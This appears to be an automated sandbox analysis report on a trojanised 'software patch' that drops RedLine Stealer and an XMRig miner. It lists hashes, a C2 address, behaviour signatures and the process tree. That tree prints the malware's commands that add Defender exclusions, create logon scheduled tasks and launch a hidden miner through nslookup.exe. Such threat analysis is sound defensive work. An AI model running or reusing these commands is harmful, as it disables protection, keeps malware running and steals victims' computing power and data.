Analysis

- max time kernel: 151s
- max time network: 170s
- platform: windows7_x64
- resource: win7-en-20210920
- submitted: 28-10-2021 16:15

Static task: static1
Behavioral task: behavioral1
Sample: Software patch by Silensix.exe
Resource: win7-en-20210920

General

- Target: Software patch by Silensix.exe
- Size: 3.0MB
- MD5: 1f1d67844ed54e1f03355f57ba8b17fc
- SHA1: 248262da44662b7347ff6de745ac498ca7984e88
- SHA256: f2f1cba015211deb613359de61bc4bed08c9ccf1af7b9af89d73aaa1f4da6d42
- SHA512: 9714f8fbd1533b54f4fbff6da24ba322e6f49ac47bc1a83d336424fb31cbd0f6b0bff8139f4ca9a13706593fbe288f89a9f74103a364fd56e13869dc32bde73d
Malware Config

Extracted:
- Family: redline
- Botnet: Youtube
- C2: 185.203.240.16:1249
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload [5 IoCs]
Memory regions matching the family_redline YARA rule (resource, rule):
- behavioral1/memory/1544-80-0x0000000000400000-0x0000000000420000-memory.dmp, family_redline
- behavioral1/memory/1544-81-0x0000000000400000-0x0000000000420000-memory.dmp, family_redline
- behavioral1/memory/1544-82-0x0000000000400000-0x0000000000420000-memory.dmp, family_redline
- behavioral1/memory/1544-83-0x0000000000418D32-mapping.dmp, family_redline
- behavioral1/memory/1544-85-0x0000000000400000-0x0000000000420000-memory.dmp, family_redline
Identifies VirtualBox via ACPI registry values (likely anti-VM) [2 TTPs]

XMRig Miner Payload [12 IoCs]
Downloads MZ/PE file

Executes dropped EXE [8 IoCs]
Processes (pid, process):
- 1752 Datafile32.exe
- 1668 Datafile64.exe
- 1396 Server32.exe
- 1544 Server32.exe
- 1696 services32.exe
- 1028 services64.exe
- 1020 sihost32.exe
- 1180 sihost64.exe
Checks BIOS information in registry [2 TTPs, 6 IoCs]
BIOS information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion, Software patch by Silensix.exe
- Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion, Software patch by Silensix.exe
- Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion, Datafile64.exe
- Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion, Datafile64.exe
- Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion, services64.exe
- Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion, services64.exe
Loads dropped DLL [12 IoCs]
Processes (pid, process):
- 1616 Software patch by Silensix.exe
- 1616 Software patch by Silensix.exe
- 1616 Software patch by Silensix.exe
- 1616 Software patch by Silensix.exe
- 1616 Software patch by Silensix.exe
- 1396 Server32.exe
- 1724 cmd.exe
- 1724 cmd.exe
- 1476 cmd.exe
- 1964 conhost.exe
- 1964 conhost.exe
- 1272 conhost.exe
Reads user/profile data of web browsers [2 TTPs]
Infostealers often target stored browser data, which can include saved credentials etc.

YARA rule matches (resource, rule):
- behavioral1/memory/1616-57-0x0000000000C50000-0x0000000000C51000-memory.dmp, themida
- \Users\Admin\AppData\Local\Temp\Datafile64.exe, themida
- C:\Users\Admin\AppData\Local\Temp\Datafile64.exe, themida
- behavioral1/memory/1668-75-0x0000000000400000-0x0000000000EAE000-memory.dmp, themida
- C:\Users\Admin\AppData\Local\Temp\Datafile64.exe, themida
- \Windows\System32\services64.exe, themida
- C:\Windows\System32\services64.exe, themida
- behavioral1/memory/1028-155-0x0000000000400000-0x0000000000EAE000-memory.dmp, themida
- C:\Windows\system32\services64.exe, themida
Accesses cryptocurrency files/wallets, possible credential harvesting [2 TTPs]

Checks installed software on the system [1 TTPs]
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
Processes (description, ioc, process):
- Key value queried, \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA, Software patch by Silensix.exe
- Key value queried, \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA, Datafile64.exe
- Key value queried, \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA, services64.exe
Legitimate hosting services abused for malware hosting/C2 [1 TTPs]

Drops file in System32 directory [12 IoCs]
Processes (description, ioc, process):
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File created, C:\Windows\system32\services64.exe, conhost.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File created, C:\Windows\system32\Microsoft\Libs\sihost64.exe, conhost.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File created, C:\Windows\system32\Microsoft\Libs\WR64.sys, conhost.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File opened for modification, C:\Windows\system32\services64.exe, conhost.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
- File opened for modification, C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger [3 IoCs]
Processes (pid, process):
- 1616 Software patch by Silensix.exe
- 1668 Datafile64.exe
- 1028 services64.exe

Suspicious use of SetThreadContext [2 IoCs]
Processes (description, pid, process, target process):
- PID 1396 set thread context of 1544, 1396, Server32.exe, Server32.exe
- PID 1272 set thread context of 1604, 1272, conhost.exe, nslookup.exe
Enumerates physical storage devices [1 TTPs]
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) [1 TTPs, 2 IoCs]
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, process):
- 1836 schtasks.exe
- 1480 schtasks.exe
Suspicious behavior: EnumeratesProcesses [36 IoCs]
Suspicious use of AdjustPrivilegeToken [16 IoCs]
Processes (description, pid, process):
- Token: SeDebugPrivilege, 1616, Software patch by Silensix.exe
- Token: SeDebugPrivilege, 1544, Server32.exe
- Token: SeDebugPrivilege, 1932, conhost.exe
- Token: SeDebugPrivilege, 1756, powershell.exe
- Token: SeDebugPrivilege, 1812, powershell.exe
- Token: SeDebugPrivilege, 1840, conhost.exe
- Token: SeDebugPrivilege, 1500, powershell.exe
- Token: SeDebugPrivilege, 1176, powershell.exe
- Token: SeDebugPrivilege, 1964, conhost.exe
- Token: SeDebugPrivilege, 1172, powershell.exe
- Token: SeDebugPrivilege, 1568, powershell.exe
- Token: SeDebugPrivilege, 1272, conhost.exe
- Token: SeDebugPrivilege, 1756, powershell.exe
- Token: SeDebugPrivilege, 1404, powershell.exe
- Token: SeLockMemoryPrivilege, 1604, nslookup.exe
- Token: SeLockMemoryPrivilege, 1604, nslookup.exe
Suspicious use of WriteProcessMemory [64 IoCs]
Processes

Each entry shows the executable path, the command line it was started with, and the signatures it triggered; the bracketed number is the depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c "C:\Users\Admin\services32.exe"
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\services32.exe
            Command line: C:\Users\Admin\services32.exe
            - Executes dropped EXE
          [6] C:\Windows\System32\conhost.exe
              Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
              - Loads dropped DLL
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                - Executes dropped EXE
              [8] C:\Windows\System32\conhost.exe
                  Command line: "C:\Windows\System32\\conhost.exe" "/sihost32"
  [2] C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
          - Loads dropped DLL
        [5] C:\Windows\system32\services64.exe
            Command line: C:\Windows\system32\services64.exe
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
          [6] C:\Windows\System32\conhost.exe
              Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              - Loads dropped DLL
              - Drops file in System32 directory
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\Microsoft\Libs\sihost64.exe
                Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                - Executes dropped EXE
              [8] C:\Windows\System32\conhost.exe
                  Command line: "C:\Windows\System32\conhost.exe" "/sihost64"
            [7] C:\Windows\System32\nslookup.exe
                Command line: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="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" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Server32.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Server32.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\Server32.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Downloads
-
\Users\Admin\services32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
\Users\Admin\services32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
\Windows\System32\Microsoft\Libs\sihost64.exeMD5
ab0e8cd9d9374369b972868842a74471
SHA1d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
SHA256873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
SHA51291d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
\Windows\System32\services64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-